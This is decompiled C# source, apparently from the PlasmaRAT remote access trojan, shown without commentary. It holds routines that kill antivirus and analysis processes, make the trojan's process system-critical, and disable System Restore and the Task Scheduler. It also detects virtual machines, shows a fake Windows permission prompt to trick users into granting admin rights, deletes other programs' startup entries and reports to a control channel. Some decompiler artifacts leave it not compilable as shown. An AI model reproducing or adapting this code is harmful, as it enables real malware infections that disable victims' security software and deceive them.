// Token: 0x0600004B RID: 75 RVA: 0x00005120 File Offset: 0x00003320
public static void Start()
{
try
{
if (!AntiEverything.IsAdmin())
{
CheckAV.RunAVAdminMode();
}
else
{
AVKill.searchav(Environment.GetEnvironmentVariable("PROGRAMDATA"));
AVKill.ProtectMyFile();
AVKill.searchav(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
AVKill.AVProcSearcher();
AVKill.FuckFileName("rstrui.exe");
AVKill.FuckFileName("AvastSvc.exe");
AVKill.FuckFileName("avconfig.exe");
AVKill.FuckFileName("AvastUI.exe");
AVKill.FuckFileName("avscan.exe");
AVKill.FuckFileName("instup.exe");
AVKill.FuckFileName("mbam.exe");
AVKill.FuckFileName("mbamgui.exe");
AVKill.FuckFileName("mbampt.exe");
AVKill.FuckFileName("mbamscheduler.exe");
AVKill.FuckFileName("mbamservice.exe");
AVKill.FuckFileName("hijackthis.exe");
AVKill.FuckFileName("spybotsd.exe");
AVKill.FuckFileName("ccuac.exe");
AVKill.FuckFileName("avcenter.exe");
AVKill.FuckFileName("avguard.exe");
AVKill.FuckFileName("avgnt.exe");
AVKill.FuckFileName("avgui.exe");
AVKill.FuckFileName("avgcsrvx.exe");
AVKill.FuckFileName("avgidsagent.exe");
AVKill.FuckFileName("avgrsx.exe");
AVKill.FuckFileName("avgwdsvc.exe");
AVKill.FuckFileName("egui.exe");
AVKill.FuckFileName("zlclient.exe");
AVKill.FuckFileName("bdagent.exe");
AVKill.FuckFileName("keyscrambler.exe");
AVKill.FuckFileName("avp.exe");
AVKill.FuckFileName("wireshark.exe");
AVKill.FuckFileName("ComboFix.exe");
AVKill.FuckFileName("MSASCui.exe");
AVKill.FuckFileName("MpCmdRun.exe");
AVKill.FuckFileName("msseces.exe");
AVKill.FuckFileName("MsMpEng.exe");
AVKill.FuckFileName("blindman.exe");
AVKill.FuckFileName("SDFiles.exe");
AVKill.FuckFileName("SDMain.exe");
AVKill.FuckFileName("SDWinSec.exe");
}
}
catch (Exception ex)
{
}
}
// Token: 0x060000D0 RID: 208 RVA: 0x0000C0C4 File Offset: 0x0000A2C4
public static void NonCriticalProcess()
{
int num;
int num5;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
if (!PlasmaRAT.WhatToRun.Contains("c"))
{
goto IL_3C;
}
IL_1A:
num2 = 3;
if (!AntiEverything.IsAdmin())
{
goto IL_3C;
}
IL_23:
num2 = 4;
IntPtr handle = Process.GetCurrentProcess().Handle;
int processInformationClass = 29;
int num3 = 0;
SetProcCritical.NtSetInformationProcess(handle, processInformationClass, ref num3, 4);
IL_3C:
goto IL_A7;
IL_3E:
int num4 = num5 + 1;
num5 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num4);
IL_68:
goto IL_9C;
IL_6A:
num5 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_7A :;
}
catch when(endfilter(obj is Exception & num != 0 & num5 == 0))
{
Exception ex = (Exception)obj2;
goto IL_6A;
}
IL_9C:
throw ProjectData.CreateProjectError(-2146828237);
IL_A7:
if (num5 != 0)
{
ProjectData.ClearProjectError();
}
}
// Token: 0x060000CF RID: 207 RVA: 0x0000BFFC File Offset: 0x0000A1FC
public static void CriticalProcess()
{
int num;
int num5;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
if (!AntiEverything.IsAdmin())
{
goto IL_3C;
}
IL_10:
num2 = 3;
SystemEvents.SessionEnding += delegate(object sender, SessionEndingEventArgs e)
{
SetProcCritical.NonCriticalProcess();
};
IL_23:
num2 = 4;
IntPtr handle = Process.GetCurrentProcess().Handle;
int processInformationClass = 29;
int num3 = 1;
SetProcCritical.NtSetInformationProcess(handle, processInformationClass, ref num3, 4);
IL_3C:
goto IL_A3;
IL_3E:
int num4 = num5 + 1;
num5 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num4);
IL_64:
goto IL_98;
IL_66:
num5 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_76 :;
}
catch when(endfilter(obj is Exception & num != 0 & num5 == 0))
{
Exception ex = (Exception)obj2;
goto IL_66;
}
IL_98:
throw ProjectData.CreateProjectError(-2146828237);
IL_A3:
if (num5 != 0)
{
ProjectData.ClearProjectError();
}
}
// Token: 0x06000086 RID: 134 RVA: 0x00008988 File Offset: 0x00006B88
public static void Disable()
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "ShowSuperHidden", "0", RegistryValueKind.DWord);
IL_28:
num2 = 3;
if (!AntiEverything.IsAdmin())
{
goto IL_94;
}
IL_31:
num2 = 4;
MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Script Host\\Settings", "REG_DWORD", "1", RegistryValueKind.DWord);
IL_52:
num2 = 5;
MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule", "Start", "4", RegistryValueKind.DWord);
IL_73:
num2 = 6;
MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", "1", RegistryValueKind.DWord);
IL_94:
goto IL_103;
IL_96:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_C4:
goto IL_F8;
IL_C6:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_D6 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_C6;
}
IL_F8:
throw ProjectData.CreateProjectError(-2146828237);
IL_103:
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
}
// Token: 0x06000081 RID: 129 RVA: 0x000084C8 File Offset: 0x000066C8
public static string AntiVM()
{
try
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController");
string str = string.Empty;
try
{
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
{
ManagementObject managementObject = (ManagementObject)managementBaseObject;
str = Convert.ToString(RuntimeHelpers.GetObjectValue(managementObject["Description"]));
string text = Strings.StrConv(str, VbStrConv.Lowercase, 0);
if (text.Contains("virtual"))
{
AntiEverything.AntisFound();
}
if (text.Contains("vmware"))
{
AntiEverything.AntisFound();
}
if (text.Contains("parallels"))
{
AntiEverything.AntisFound();
}
if (text.Contains("vm additions"))
{
AntiEverything.AntisFound();
}
}
}
finally
{
ManagementObjectCollection.ManagementObjectEnumerator enumerator;
if (enumerator != null)
{
((IDisposable)enumerator).Dispose();
}
}
}
catch (Exception ex)
{
}
string result;
return result;
}
// Token: 0x06000080 RID: 128 RVA: 0x00008418 File Offset: 0x00006618
public static void RunAntis()
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
if (File.Exists(Path.GetTempPath() + "microsoft.ini"))
{
goto IL_27;
}
IL_1F:
num2 = 3;
AntiEverything.AntiVM();
IL_27:
goto IL_8A;
IL_29:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_4B:
goto IL_7F;
IL_4D:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_5D:;
}
catch when (endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_4D;
}
IL_7F:
throw ProjectData.CreateProjectError(-2146828237);
IL_8A:
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
}
// Token: 0x06000043 RID: 67 RVA: 0x00004C78 File Offset: 0x00002E78
public static void RunAVAdminMode()
{
try
{
string text = Path.GetTempPath() + "HardwareCheck.exe";
if (!AntiEverything.IsAdmin() && Operators.CompareString(PlasmaRAT.GetAntiVirus(), "AntiVirus: N/A", false) != 0 && Operators.CompareString(Interaction.GetSetting("Microsoft", "Sysinternals", "AV", ""), "ran", false) != 0)
{
if (!File.Exists(text))
{
File.Copy(Application.ExecutablePath, text);
}
ProcessStartInfo processStartInfo = new ProcessStartInfo("cmd.exe", string.Concat(new string[]
{
"/c ",
text,
"\r\n\r\n Windows has detected a recent software change and needs permissions to continue. This process will take about 30-60 seconds depending on your internet connection. Please hit Yes to continue.\r\n\r\nSystem Info:\r\nAccount: ",
Environment.UserName.ToString().ToString(),
"\r\nProcessor Count: ",
Environment.ProcessorCount.ToString(),
"\r\nOperating System: ",
MyProject.Computer.Info.OSFullName
}));
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
processStartInfo.UseShellExecute = true;
processStartInfo.WorkingDirectory = Environment.CurrentDirectory;
processStartInfo.Verb = "runas";
try
{
Process.Start(processStartInfo);
Interaction.SaveSetting("Microsoft", "Sysinternals", "AV", "ran");
PlasmaRAT.TalktoChannel("AV Killer: Targeted " + PlasmaRAT.GetAntiVirus(), string.Empty);
}
catch (Exception ex)
{
}
}
}
catch (Exception ex2)
{
}
}
// Token: 0x0600005C RID: 92 RVA: 0x0000602C File Offset: 0x0000422C
public static object HardBotKill()
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
if (AntiEverything.AntisDetected)
{
goto IL_AB;
}
IL_13:
num2 = 3;
BotKillers.RunStartupKiller();
IL_1A:
num2 = 4;
HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true));
IL_32:
num2 = 5;
HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true));
IL_4A:
num2 = 6;
BotKillers.KillFile(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
IL_57:
num2 = 7;
if (!AntiEverything.IsAdmin())
{
goto IL_91;
}
IL_60:
num2 = 8;
HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true));
IL_78:
num2 = 9;
HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true));
IL_91:
num2 = 11;
BotKillers.ScanProcess();
IL_99:
num2 = 12;
PlasmaRAT.TalktoChannel("BK: Hard Bot Killer Ran Successfully!", string.Empty);
IL_AB:
goto IL_135;
IL_B0:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_F6:
goto IL_12A;
IL_F8:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_108 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_F8;
}
IL_12A:
throw ProjectData.CreateProjectError(-2146828237);
IL_135:
object obj3;
object result = obj3;
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
return(result);
}
// Token: 0x06000058 RID: 88 RVA: 0x00005C48 File Offset: 0x00003E48
public static void RunStartupKiller()
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 1);
IL_14:
num2 = 3;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 1);
IL_21:
num2 = 4;
if (!AntiEverything.IsAdmin())
{
goto IL_44;
}
IL_2A:
num2 = 5;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 2);
IL_37:
num2 = 6;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 2);
IL_44:
num2 = 8;
string[] files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
IL_52:
num2 = 9;
string[] array = files;
int i = 0;
while (i < array.Length)
{
string location = array[i];
IL_66:
num2 = 10;
BotKillers.KillFile(location);
i++;
IL_76:
num2 = 11;
}
IL_80:
goto IL_106;
IL_85:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_C5:
goto IL_FB;
IL_C7:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_D8 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_C7;
}
IL_FB:
throw ProjectData.CreateProjectError(-2146828237);
IL_106:
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
}
